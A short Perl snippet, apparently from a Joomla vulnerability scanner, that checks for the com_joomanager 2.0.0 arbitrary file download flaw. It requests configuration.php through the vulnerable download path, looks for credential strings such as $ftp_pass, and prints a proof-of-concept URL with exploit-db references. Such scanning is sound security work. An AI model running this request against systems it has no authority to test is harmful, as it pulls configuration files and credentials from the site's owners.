#start com_joomanager module exploit Checker
$source=$ua->get("$target/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php")->decoded_content;
if ($source =~ /\$ftp_pass/g or $source =~ /\$error_reporting/g or $source =~ /\/usr\/sbin\/sendmail/g   ) {
	dprint("Checking module: com_joomanager");
	tprint("Joomla! Component Joomanager 2.0.0 - Arbitrary File Download\nPOC: $target/index.php?option=com_joomanager&controller=details&task=download&path=configuration.php\nhttps://www.exploit-db.com/exploits/44252/\nhttps://www.exploit-db.com/exploits/42590/\n");
}
#end com_joomanager module exploit Checker

